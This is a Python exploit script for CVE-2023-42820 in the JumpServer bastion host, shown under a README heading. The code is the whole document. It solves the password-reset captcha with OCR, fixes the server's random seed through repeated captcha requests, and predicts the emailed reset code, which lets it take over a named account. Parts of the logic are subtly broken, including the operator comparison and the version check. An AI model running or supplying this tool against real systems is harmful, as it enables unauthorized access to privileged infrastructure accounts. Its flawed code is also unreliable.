README.md
Rendering markdown...
# -*- coding: utf-8 -*-
import io
import re
from distutils.version import LooseVersion
import colorlog
import httpx
import logging
import sys
import random
import string
import argparse
from urllib.parse import urljoin, urlparse, parse_qs
import ddddocr
from PIL import Image
from bs4 import BeautifulSoup
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36',
}
# 定义特殊符号
string_punctuation = '!#$%&()*+,-.:;<=>?@[]^_~'
# 代理设置
PROXIES = {}
def banner():
print('''
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗██████╗ █████╗ ██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ██║ ██║╚════██╗██╔══██╗╚════██╗██╔═████╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝ █████╔╝██║██╔██║
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗██╔═══╝ ████╔╝██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║███████╗╚█████╔╝███████╗╚██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝ ╚════╝ ╚══════╝ ╚═════╝
@Auth: C1ph3rX13
@Blog: https://c1ph3rx13.github.io
@Note: 代码仅供学习使用,请勿用于其他用途
''')
def setup_color_logging():
# 创建一个 colorlog 的日志记录器
logger = colorlog.getLogger()
logger.setLevel(logging.INFO)
# 创建控制台处理器并设置格式
console_handler = logging.StreamHandler(sys.stdout)
console_formatter = colorlog.ColoredFormatter(
'%(asctime)s - %(log_color)s%(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
reset=True,
log_colors={
'DEBUG': 'cyan',
'INFO': 'green',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'bold_red',
}
)
console_handler.setFormatter(console_formatter)
# 将处理器添加到日志记录器
logger.addHandler(console_handler)
return logger
# 日志记录器对象
logger = setup_color_logging()
# 根据 JumpServer 的代码实现的重置验证码解密
def random_string(length: int, lower=True, upper=True, digit=True, special_char=False):
args_names = ['lower', 'upper', 'digit', 'special_char']
args_values = [lower, upper, digit, special_char]
args_string = [string.ascii_lowercase, string.ascii_uppercase, string.digits, string_punctuation]
args_string_map = dict(zip(args_names, args_string))
kwargs = dict(zip(args_names, args_values))
kwargs_keys = list(kwargs.keys())
kwargs_values = list(kwargs.values())
args_true_count = len([i for i in kwargs_values if i])
assert any(kwargs_values), f'Parameters {kwargs_keys} must have at least one `True`'
assert length >= args_true_count, f'Expected length >= {args_true_count}, bug got {length}'
can_startswith_special_char = args_true_count == 1 and special_char
chars = ''.join([args_string_map[k] for k, v in kwargs.items() if v])
while True:
password = list(random.choice(chars) for i in range(length))
for k, v in kwargs.items():
if v and not (set(password) & set(args_string_map[k])):
# 没有包含指定的字符, retry
break
else:
if not can_startswith_special_char and password[0] in args_string_map['special_char']:
# 首位不能为特殊字符, retry
continue
else:
# 满足要求终止 while 循环
break
password = ''.join(password)
return password
def nop_random(seed: str):
random.seed(seed)
for i in range(4):
random.randrange(-35, 35)
for p in range(int(180 * 38 * 0.1)):
random.randint(0, 180)
random.randint(0, 38)
# 循环访问 seed 污染 worker 来达到固定 seed
def fix_seed(target: str, seed: str):
def _request(i: int, u: str):
logging.info('Send %d Request to %s', i, u)
response = httpx.get(url=u, headers=headers, timeout=5, verify=False, proxies=PROXIES)
assert response.status_code == httpx.codes.OK
assert response.headers['Content-Type'] == 'image/png'
url = urljoin(target, '/core/auth/captcha/image/' + seed + '/')
for idx in range(10):
_request(idx, url)
def get_seed(target: str):
url = urljoin(target, "/core/auth/password/forget/previewing/")
# url = urljoin(target, "/core/auth/password/forgot/")
response = httpx.get(url=url, headers=headers, follow_redirects=False, verify=False, proxies=PROXIES)
if response.status_code == httpx.codes.OK:
# 匹配 seed
html_text = response.text
soup = BeautifulSoup(html_text, "lxml")
captcha_src = soup.select_one('.captcha').get('src')
seed = captcha_src.split('/')[-2]
logging.critical("Get Seed: %r", seed)
return seed
else:
return False
def ocr_captcha(target: str, max_attempts=5):
attempts = 0
while attempts < max_attempts:
try:
# 获取验证码图片
seed = get_seed(target)
if seed is None:
logging.error("Failed to Get Captcha Seed")
return None
image_url = urljoin(target, 'core/auth/captcha/image/' + seed + '/')
response = httpx.get(url=image_url, headers=headers, verify=False, proxies=PROXIES)
response.raise_for_status()
img_bytes = io.BytesIO(response.content)
# 图片识别
res_code = recognize_captcha(img_bytes)
# 计算验证码结果
result = calculate_captcha_result(res_code)
if result is not None:
logging.critical("Captcha Result: %r", result)
return str(result), seed
except (httpx.HTTPError, httpx.RequestError) as e:
logging.error("Failed to Fetch Captcha Image: %s", str(e))
attempts += 1
return None
def recognize_captcha(img_bytes):
ocr = ddddocr.DdddOcr()
img = Image.open(img_bytes).convert('L')
img = img.resize((int(img.size[0] * (64 / img.size[1])), 64), Image.ANTIALIAS)
img_bytes = io.BytesIO()
img.save(img_bytes, format='PNG')
img_bytes = img_bytes.getvalue()
res_code = ocr.classification(img_bytes)
logging.warning("Captcha Image Result: %s", res_code)
return res_code
def calculate_captcha_result(res_code):
if len(res_code) < 3 or res_code[1] not in ['+', '-', '*', '/', 'x'] or '10' in res_code or 'o' in res_code:
logging.warning("Failed to Convert Operands to Integers")
return None
operator = re.findall(r"[+\-*/x]", res_code)[0]
operands = re.findall(r"\d+", res_code)
if len(operands) != 2:
logging.warning("Failed to Convert Operands to Integers")
return None
try:
a, b = map(int, operands)
if operator == ["+", "x"]:
result = a + b
elif operator == "-":
result = a - b
elif operator in "*":
result = a * b
elif operator == "/":
result = a / b
else:
logging.error("Invalid Operator: %s", operator)
return None
return result
except (ValueError, ZeroDivisionError) as e:
logging.warning("Failed to Calculate Captcha Result: %s", str(e))
return None
def get_token(target: str, username: str):
url = urljoin(target, "/core/auth/password/forget/previewing/")
# 获取 csrf_token
with httpx.Client(headers=headers, follow_redirects=True, verify=False, proxies=PROXIES) as client:
token_resp = client.get(url=url)
assert token_resp.status_code == httpx.codes.OK
# 匹配参数
html_text = token_resp.text
soup = BeautifulSoup(html_text, "lxml")
# 匹配 csrf_token
csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'}).get('value')
logging.critical("Get Csrf_Token: %s", csrf_token)
# 匹配 token_seed, 计算验证码结果
token_captcha, token_seed = ocr_captcha(target)
# 发起表单 POST 请求
csrf_cookies = token_resp.cookies
data = {
'csrfmiddlewaretoken': csrf_token,
'username': username,
'captcha_0': token_seed,
'captcha_1': token_captcha,
}
response = client.post(url=url, data=data, cookies=csrf_cookies)
assert response.status_code == httpx.codes.OK
# 匹配 token
parsed_url = urlparse(str(response.url))
query_dict = parse_qs(parsed_url.query)
reset_token = query_dict.get('token', [''])[0]
logging.critical("Get Token: %s", reset_token)
return str(reset_token)
def send_code(target: str, email: str, reset_token: str):
url = urljoin(target, "/api/v1/authentication/password/reset-code/?token=" + reset_token)
response = httpx.post(url=url, json={
'email': email,
'sms': '',
'form_type': 'email',
}, headers=headers, follow_redirects=False, verify=False, proxies=PROXIES)
if response.status_code == httpx.codes.OK:
logging.info("Send Code Headers: %r Response: %r", response.headers, response.text)
return True
else:
return False
def check_version(target: str):
if get_seed(target):
# 发送 GET 请求获取页面内容
with httpx.Client(headers=headers, verify=False, follow_redirects=True, proxies=PROXIES) as client:
response = client.get(url=target)
page_content = response.text
# 类似 src=/ui/assets/js/<jsFile></script></body></html>
match = re.search(r'src=/ui/assets/js/(?P<jsFile>[a-zA-Z0-9.]+)></script></body></html>', page_content)
if match:
js_file = match.group('jsFile')
logger.critical("Found JSFile: %s", js_file)
else:
logger.critical("Not Found")
exit()
js_url = f"{target}/ui/assets/js/{js_file}"
js_response = client.get(url=js_url)
js_content = js_response.text
# 匹配版本号
pattern1 = r'value:"v(\d+\.\d+\.\d+)"'
pattern2 = r'version:"(\d+\.\d+\.\d+)"'
match1 = re.search(pattern1, js_content)
if match1:
version = match1.group(1)
logger.critical("Found Version: %s", version)
else:
match2 = re.search(pattern2, js_content)
if match2:
version = match2.group(1)
logger.critical("Found Version: %s", version)
else:
logger.critical("Not Found")
# 判断漏洞版本
if LooseVersion(version) <= LooseVersion('2.28.20') or LooseVersion(version) <= LooseVersion('3.7.1'):
logger.critical("Vulnerable")
return True
else:
return False
def main(target: str, email: str, username: str):
if check_version(target):
# 获取 seed
seed = get_seed(target)
# 获取token
reset_token = get_token(target, username)
# POST
fix_seed(target, seed)
nop_random(seed)
if send_code(target, email, reset_token):
code = random_string(6, lower=False, upper=False)
logging.critical("Your Code is %s", code)
reset_url = urljoin(target, '/core/auth/password/forgot/?token=' + reset_token)
logger.critical('Reset Url: %s', reset_url)
else:
logging.critical("Send Code Fail")
else:
logger.critical("Not Vulnerable")
if __name__ == '__main__':
banner()
parser = argparse.ArgumentParser(description='CVE-2023-42820 by C1ph3rX13.')
parser.add_argument('-t', '--target', type=str, required=True, help='target url')
parser.add_argument('-e', '--email', type=str, required=True, help='account email')
parser.add_argument('-u', '--username', type=str, required=True, help='account username')
parser.add_argument("--proxy", type=str, required=False, help="proxy to http://ip:port")
args = parser.parse_args()
if args.proxy:
PROXIES = {'all://': f'{args.proxy}'}
main(args.target, args.email, args.username)